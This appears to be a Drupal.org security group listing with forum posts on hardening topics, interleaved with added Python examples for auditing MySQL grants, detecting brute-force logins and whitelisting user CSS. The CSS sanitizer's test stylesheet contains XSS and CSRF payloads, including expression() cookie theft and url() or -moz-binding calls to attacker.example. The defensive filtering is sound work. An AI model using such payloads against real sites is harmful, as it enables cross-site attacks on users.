Security

We encourage users to post events happening in the community to the community events group on https://www.drupal.org.

Discuss security best practices in general. This is NOT a place to discuss vulnerabilities in released versions of specific public modules or Drupal core. Please only ask questions before releasing a module, or phrase them generally. If you find a security vulnerability in publicly available code, the proper thing to do is report it to the Security Team.

On Twitter, see @drupalsecurity.

Posted by greggles

Allowing Apache to write files

There was recently a presentation about whether or not it's safe to let the webserver write to your document root:

http://www.pcworld.com/businesscenter/article/209860/how_default_app_ins...

This is something I've heard our community go back and forth about. I'd like us to come to a more solid position on the topic.

He also cites granting more mysql permissions than necessary as a mistake (one we avoid, though we could be a bit more strict...do we need the permission to drop tables, for example?).

Posted by mfb

Secure Login module not dead yet

Secure Login module was in need of a maintainer, so I decided to take it on.

What I like about Secure Login is that it's a small, simple module that makes it easy to enforce secure (SSL) logins on a Drupal site.

I've already committed a Drupal 7 version which could use testing and feedback.

Posted by mgifford

Best Practices for Module/Theme level Security Reviews

Are there any best practices or approaches to reviewing individual modules or themes?

I do feel that modules posted to Drupal.org are more secure than those posted elsewhere, simply because the framework allows for an easy way for us to receive updates when there are security issues. However, other than people posting security patches, what processes are being used to scan contributed code for problems?

There are a number of approaches for general PHP development which would certainly apply:
http://www.addedbytes.com/writing-secure-php/

Posted by themselves

Highly-secure Drupal installation

Hi everyone,

What we've been doing around here is trying to put together an implementation framework that would deliver the most secure Drupal possible. Our idea so far is this:

First layer is a Varnish cache - it is the only publicly exposed port of the entire infrastructure.

Second layer is a Drupal install with a read-only MySQL user (other than the session, watchdog and cache tables, of course), so that even if someone elevates permissions in Drupal, they are unable to write anything to the database.

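
To check that a database account actually matches the design described above (SELECT everywhere, writes only on the session, watchdog and cache tables, and, picking up greggles's question from the Apache thread, no schema-changing privileges such as DROP), here is an added example that is not code from the post or from Drupal: a small Python audit over the output of MySQL's SHOW GRANTS. The whitelist of writable tables, the privilege sets and the SHOW GRANTS sample are my assumptions; the table names assume Drupal's default, prefix-less schema.

```python
import re

# Tables a Drupal site must still write to with an otherwise read-only account
# (the post names session, watchdog and cache tables). Names assume Drupal's
# default, prefix-less schema and the Drupal 6 cache_* tables (an assumption).
WRITABLE_TABLES = {
    "sessions", "watchdog", "cache", "cache_block", "cache_filter",
    "cache_form", "cache_menu", "cache_page", "cache_update",
}
WRITE_PRIVS = {"INSERT", "UPDATE", "DELETE"}
# Schema-changing privileges a running site never needs; in this design
# update.php would be run with a separate, more privileged account.
DDL_PRIVS = {"DROP", "ALTER", "CREATE", "INDEX", "REFERENCES",
             "CREATE TEMPORARY TABLES", "LOCK TABLES"}

# One line of SHOW GRANTS output: GRANT <privs> ON <db>.<table> TO ...
GRANT_RE = re.compile(r"^GRANT\s+(?P<privs>.+?)\s+ON\s+(?P<obj>\S+)\s+TO\s", re.I)


def parse_grant(line):
    """Return (privileges, db, table) for one GRANT line, or None if it is not one."""
    m = GRANT_RE.match(line.strip())
    if not m:
        return None
    privs = {p.strip().upper() for p in m.group("privs").split(",")}
    db, _, table = m.group("obj").replace("`", "").partition(".")
    return privs, db, table


def audit_grants(show_grants_output, writable_tables=WRITABLE_TABLES):
    """Flag every grant that breaks the read-only-except-whitelist design."""
    findings = []
    for line in show_grants_output.splitlines():
        parsed = parse_grant(line)
        if parsed is None:
            continue
        privs, db, table = parsed
        target = f"{db}.{table}"
        if privs & {"ALL", "ALL PRIVILEGES"}:
            findings.append(f"{target}: ALL PRIVILEGES granted, account is not read-only")
            continue
        ddl = privs & DDL_PRIVS
        if ddl:
            findings.append(f"{target}: DDL privilege(s) {sorted(ddl)} not needed at runtime")
        writes = privs & WRITE_PRIVS
        # a write grant on the whole schema ("*") or on a table outside the
        # whitelist lets a compromised Drupal modify content, users or roles
        if writes and (table == "*" or table not in writable_tables):
            findings.append(f"{target}: write privilege(s) {sorted(writes)} outside the writable set")
    return findings


# Constructed SHOW GRANTS output (not from a real server) for an account that
# is almost right: read-only on the schema and writable on the session,
# watchdog and page-cache tables, but with a stray DROP on the whole schema
# and an INSERT left on node.
SAMPLE_SHOW_GRANTS = """
GRANT USAGE ON *.* TO 'drupal_ro'@'localhost' IDENTIFIED BY PASSWORD '*HASH'
GRANT SELECT, DROP ON `drupal`.* TO 'drupal_ro'@'localhost'
GRANT SELECT, INSERT, UPDATE, DELETE ON `drupal`.`sessions` TO 'drupal_ro'@'localhost'
GRANT SELECT, INSERT, UPDATE, DELETE ON `drupal`.`watchdog` TO 'drupal_ro'@'localhost'
GRANT SELECT, INSERT, UPDATE, DELETE ON `drupal`.`cache_page` TO 'drupal_ro'@'localhost'
GRANT INSERT ON `drupal`.`node` TO 'drupal_ro'@'localhost'
"""

if __name__ == "__main__":
    for finding in audit_grants(SAMPLE_SHOW_GRANTS):
        print(finding)
```

Run it against `mysql -e "SHOW GRANTS FOR 'drupal_ro'@'localhost'"` output after each deployment; the sample above yields two findings, the DROP on the schema and the INSERT on node.
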
Posted by jmiccolis

Vuln module, a XSS feature

I created a quick XSS module last week that I've been using for testing, and it was suggested that I post it here in case others found it useful. The module is here: http://github.com/miccolis/vuln

The module is simply a bunch of exported (a la Features module) configuration that is loaded with script tags. The idea is that as you build out your site and theme, you work with this module enabled occasionally and get an alert when you've slipped up. It is not an automated testing tool.

Posted by greggles

Security related policies for code hosted on Drupal.org

We've got some licensing and third-party code rules for Drupal.org CVS.

The Security Team has set some policies that it enforces, but these policies impact module maintainers and, so far, we have not really informed maintainers that they should agree to the policies of the Security Team as well.

This is the big one: http://drupal.org/security-advisory-policy

We also attempt to follow a "14 days from reporting to release" and our template e-mail to module maintainers includes a date roughly 14 days in the future:

Posted by pfortuna

Security Alert: Drupal Context module

A researcher has uncovered a potentially serious vulnerability in the open-source content management system used by the White House website and thousands of other sites.

The XSS, or cross-site scripting, bug resides in the Drupal Context module, a plug-in that Whitehouse.gov and about 10,000 other sites use to manage how content is viewed on their sites. According to an advisory published Monday by researcher Justin Klein Keane, the flaw allows attackers to inject malicious scripts into login pages that will reset the site's administrative password.

Posted by greggles

Announcing Drupal Security Report

Ben and I are happy to have just launched http://drupalsecurityreport.org/

After several months of working on this project the paper has reached 1.0 status.

Of course it wouldn't have been possible without the support of many sponsors and reviewers:

Posted by greggles

IBM X-Force Report - Drupal and other systems

There is an IBM X-Force report about the state of security in a variety of platforms.

The researchers make some interesting claims. As always, doing this kind of thing is fraught with questionable assumptions, generalizations, and guesses that make the reports easy targets for criticism in spite of the best efforts of the authors.

One thing to note: they claim that there are unpatched vulnerabilities in a lot of the systems and give numbers for Drupal where I'm not sure what their source data is. If anyone can get in touch with the authors to ask for raw data I'd love to see it.

Posted by joachim

webform registration - skipping password changing?

I've written a module that streamlines the registration process for webforms that don't allow anon users to submit.

Before I create a project for it on d.org, I'd like people's opinions on what it does to the login process.

What the module does is this: when an anonymous user goes to the webform node, they are shown the registration form instead. When they first log in, they are taken back to the same webform node. (As far as I can tell, this is not doable with login toboggan or login_destination.)

Posted by greggles

Top vulnerabilities in Drupal and how can we make the API easier to understand / "safe by default"

The Common Weaknesses Enumeration (CWE) has lots of information about the most common problems in web software. There is lots of information to sift through, but of the top 25 dangerous programming errors, XSS is #1.

http://cwe.mitre.org/top25/#Listing

This matches what we see within the Drupal project.

What can we (Drupal) do better to avoid this problem?

Posted by greggles

remove phpinfo from core for security reasons: PCI-DSS

A site that I'm working on has gone through a PCI scan and the reviewers said that the call to phpinfo disqualifies the site from passing the PCI certification.

Ever since Drupal 5 a call to phpinfo() has been included in system.module.

So, what is the solution if your PCI reviewer sees this as a problem? Do we just patch it to remove the call to phpinfo and replace it with a suitable message? Should we push back on them and say that nobody else is requiring this?

Posted by rjbrown99

Adobe Flash / User contributed content vulnerability

So - has anyone else had a chance to look at the Adobe Flash vulnerability?

http://www.foregroundsecurity.com/MyBlog/flash-origin-policy-issues.html
http://www.computerworld.com/s/article/9140768/Flash_flaw_puts_most_site...

It would appear that there is no easy way to handle it short of their suggestion to serve back all user-supplied content from a different domain. I can't see any logical way to accomplish that via Drupal considering the wide range of site sizes and complexities.

Posted by R.J. Steinert

SSL officially insecure?

A zero-day flaw in the TLS and SSL protocols has been made public and man-in-the-middle attacks have been demonstrated. I caught wind of this off of ZDnet.

http://news.zdnet.co.uk/security/0,1000000189,39860592,00.htm

Thoughts?

Posted by ilo

Login Security for Drupal 6 1.0 release is out

It took some time, but finally the 6.x-1.0 version of Login Security module is out. For a brief introduction to the module features please go to the module documentation. The README file included in the module explains the different options for the module settings and a configuration example.

Hope you enjoy the module!

Posted by greggles

How long should we wait to disclose explanations/proof of concept

It's ok to disclose immediately after the SA is released: 44% (8 votes)
Wait some period of time (like 2 weeks): 28% (5 votes)
Wait until usage of the module falls off: 0% (0 votes)
We should never go out of our way to disclose the real details: 28% (5 votes)
Total votes: 18

Posted by ilo

Login Security, closing last stint for 1.0 release

I'm happy to announce that the Login Security module release 6.x-1.0 is about to be born. Currently, there is only one issue open. This issue takes care of string consolidation and English grammar. I'm not a native English speaker, so there will probably be some words and corrections to be done. I would appreciate any help with this issue.

There is a new feature included for this 1.0 release: ongoing brute-force attack detection that could easily be expanded for more paranoid settings... probably in the 2.0 :)

You can check the current roadmap status and (I hope) participate in the English correction.

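
The post mentions ongoing brute-force detection without spelling out a mechanism. As an added example that is not Login Security's own code, the Python below shows one way to do it: sliding-window counters over failed logins keyed by account, by source IP and site-wide, the last of which catches a guess spread thinly across many accounts and many addresses that the per-key counters alone would miss. The log lines are constructed in the shape of Drupal's "Login attempt failed for %user." and "Session opened for %name." watchdog messages with a timestamp and client IP prepended; the thresholds and windows are assumptions to tune per site.

```python
import re
from collections import defaultdict, deque
from datetime import datetime, timedelta


class LoginMonitor:
    """Sliding-window failed-login counters keyed by account, by source IP and
    site-wide. The site-wide counter is what turns this into ongoing-attack
    detection: a guess spread over many accounts and many addresses never
    trips the per-key counters but does push the global failure rate up."""

    def __init__(self, user_limit=(5, 900), ip_limit=(10, 300), site_limit=(15, 300)):
        # (failures, window in seconds); the numbers are assumptions, tune per site
        self.limits = {"user": user_limit, "ip": ip_limit, "site": site_limit}
        self.windows = {kind: defaultdict(deque) for kind in self.limits}

    def _over(self, kind, key, ts):
        threshold, seconds = self.limits[kind]
        q = self.windows[kind][key]
        q.append(ts)
        while q and (ts - q[0]).total_seconds() > seconds:
            q.popleft()
        return len(q) >= threshold

    def record(self, ts, user, ip, success):
        """Record one attempt; return the set of counters this failure pushed over threshold."""
        if success:
            # design choice: a real login clears the account's counter, so an
            # earlier guess spree does not lock the legitimate user out later
            self.windows["user"].pop(user, None)
            return set()
        return {kind for kind, key in (("user", user), ("ip", ip), ("site", "*"))
                if self._over(kind, key, ts)}


# Constructed log lines (not real data) in the shape of Drupal's watchdog
# messages "Login attempt failed for %user." and "Session opened for %name.",
# with a timestamp and the client IP prepended as a log export would.
LOG_RE = re.compile(
    r"^(?P<ts>\d{4}-\d\d-\d\d \d\d:\d\d:\d\d) (?P<ip>\S+) "
    r"(?:Login attempt failed for (?P<failed>.+)\.|Session opened for (?P<opened>.+)\.)$"
)


def parse_line(line):
    """Return (timestamp, user, ip, success) or None for lines that are not login events."""
    m = LOG_RE.match(line)
    if not m:
        return None
    ts = datetime.strptime(m.group("ts"), "%Y-%m-%d %H:%M:%S")
    if m.group("failed") is not None:
        return ts, m.group("failed"), m.group("ip"), False
    return ts, m.group("opened"), m.group("ip"), True


def _build_sample():
    base = datetime(2010, 1, 10, 12, 0, 0)
    stamp = lambda s: f"{base + timedelta(seconds=s):%Y-%m-%d %H:%M:%S}"
    # one source hammering one account: six guesses at 'admin', 10 s apart
    lines = [f"{stamp(10 * i)} 198.51.100.7 Login attempt failed for admin." for i in range(6)]
    # one source sweeping twelve different accounts, one guess each
    lines += [f"{stamp(60 + 5 * i)} 203.0.113.9 Login attempt failed for user{i}." for i in range(12)]
    lines.append(f"{stamp(200)} 192.0.2.44 Session opened for alice.")
    return lines


SAMPLE_LOG = _build_sample()


def detect(lines, monitor=None):
    """Feed log lines through the monitor; return {counter: index of the first line that tripped it}."""
    monitor = monitor or LoginMonitor()
    first_hit = {}
    for i, line in enumerate(lines):
        event = parse_line(line)
        if event is None:
            continue
        for kind in monitor.record(*event):
            first_hit.setdefault(kind, i)
    return first_hit


if __name__ == "__main__":
    for kind, i in sorted(detect(SAMPLE_LOG).items(), key=lambda kv: kv[1]):
        print(f"{kind} threshold crossed at: {SAMPLE_LOG[i]}")
```

On the sample the per-account counter trips on the fifth guess at admin, the site-wide counter on the fifteenth failure overall, and the per-IP counter on the sweeping source's tenth guess; none of the swept accounts ever reaches its own per-account threshold, which is the case the site-wide counter exists for.
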
Posted by greggles

Filtering User Generated CSS

There are several modules which allow for user/admin generated css to be injected into the page.

CSS can contain cross-site scripting attacks, and the use of url() helps make it a means to exploit CSRF. What can we do to filter user-generated CSS so that it is safe?

One strategy seems to be something like the way color module/garland work: users are limited to choosing specific colors which are inserted into specific pieces of the CSS. This is also what a lot of other sites do (twitter, bebo, etc.). That's great, but limiting.

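
The color module approach above can be generalised a step without giving users free-form CSS: accept a small whitelist of properties, each with a strict value grammar, and drop every other declaration. Because the grammars only admit characters that cannot form a function call, an escape sequence or a comment, url(), expression(), behavior:, -moz-binding: and their escaped or comment-split variants are excluded by construction rather than by a blacklist. The Python below is an added example, not Drupal or any module's code; the property list, the value grammars and the sample stylesheet are mine.

```python
import re

# Value grammars. Only characters that cannot form a function call, an
# escape sequence or a comment are ever accepted, so url(), expression(),
# behavior:, -moz-binding:, "\75rl(" and /* */ tricks are excluded by
# construction rather than by a blacklist.
COLOR = r"(?:#[0-9a-fA-F]{3}|#[0-9a-fA-F]{6}|[a-zA-Z]{3,20})"
LENGTH = r"(?:-?\d{1,4}(?:\.\d+)?(?:px|em|%)|0)"
SPACING = rf"(?:{LENGTH}|auto)(?:\s+(?:{LENGTH}|auto)){{0,3}}"

# Whitelisted properties; everything else is dropped. This list is an
# assumption for the example, not taken from a Drupal module.
ALLOWED = {
    "color": COLOR,
    "background-color": COLOR,
    "border-color": COLOR,
    "font-size": LENGTH,
    "font-weight": r"(?:normal|bold|[1-9]00)",
    "text-align": r"(?:left|right|center|justify)",
    "margin": SPACING,
    "padding": SPACING,
}
VALUE_RE = {prop: re.compile(rf"^{pat}$") for prop, pat in ALLOWED.items()}
# plain type/class/id/descendant/pseudo-class selectors; no attribute
# selectors, parentheses, quotes or backslashes
SELECTOR_RE = re.compile(r"^[\w\s.#>:,-]+$")
COMMENT_RE = re.compile(r"/\*.*?\*/", re.S)
RULE_RE = re.compile(r"([^{}]+)\{([^{}]*)\}", re.S)


def filter_css(css):
    """Return (safe_css, rejected): safe_css keeps only whitelisted
    declarations whose values match their grammar; rejected lists what was dropped."""
    safe_rules, rejected = [], []
    # strip comments first so declarations are judged on what the browser
    # will actually see; text outside braces (e.g. @import) attaches to the
    # following selector and fails the selector check
    for raw_sel, body in RULE_RE.findall(COMMENT_RE.sub("", css)):
        sel = " ".join(raw_sel.split())
        if not SELECTOR_RE.match(sel):
            rejected.append(f"selector: {sel}")
            continue
        kept = []
        for decl in body.split(";"):
            if not decl.strip():
                continue
            prop, _, value = decl.partition(":")
            prop, value = prop.strip().lower(), " ".join(value.split())
            pattern = VALUE_RE.get(prop)
            if pattern and pattern.match(value):
                kept.append(f"{prop}: {value}")
            else:
                rejected.append(f"{sel} {{ {decl.strip()} }}")
        if kept:
            safe_rules.append(f"{sel} {{ {'; '.join(kept)}; }}")
    return "\n".join(safe_rules), rejected


# Constructed user stylesheet (not from a real site): benign declarations
# mixed with the classic CSS attack vectors the post alludes to.
SAMPLE_CSS = """
/* my profile theme */
.profile h2 { color: #336699; font-size: 1.2em; font-weight: bold; }
.profile { background-color: #fff; background-image: url(http://attacker.example/admin/delete?nid=1); }
.profile a:hover { width: expression(alert(document.cookie)); color: red; }
.evil { behavior: url(xss.htc); }
body { -moz-binding: url("http://attacker.example/xbl.xml#x"); margin: 0 auto; }
"""

if __name__ == "__main__":
    safe, dropped = filter_css(SAMPLE_CSS)
    print(safe)
    for d in dropped:
        print("dropped:", d)
```

On the sample the four hostile declarations are dropped and the benign colour, size, weight and margin declarations survive; the .evil rule disappears entirely because nothing in it was allowed. Widening the whitelist is a matter of adding a property and a grammar, which keeps the review focused on one question per property: can this value grammar ever produce a URL, a script or an escape?
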
Posted by ilo

"Login Security" module uses and roadmap for a 6.x stable release

Hi, I'm in the process of creating a stable release of the "login security" module, and would like to inform current users of this module about it, to recall their ideas and most used features and remove (or not) the rest of them.

I don't know how to make a public call about it, and would not like to create a release just to make this kind of notice, since everyone would then have to update their module version, so I've decided to post it here.

If you have any consideration or would like to know about this stable release please go to:

http://drupal.org/node/397890

Posted by jadwigo

Securing your admin area with SSL in Drupal (and other systems)

This article is here to start a discussion about this topic, and maybe go on making this into a GSOC proposal or a new module.

Securing your admin area with SSL in Drupal

Setting up a secure administration environment in Drupal is still complicated, and might even be an important security flaw in several configurations. A large part of this is due to the architecture of Drupal, which does not have a dedicated admin area and draws little distinction between normal (unprivileged) users and admin users.
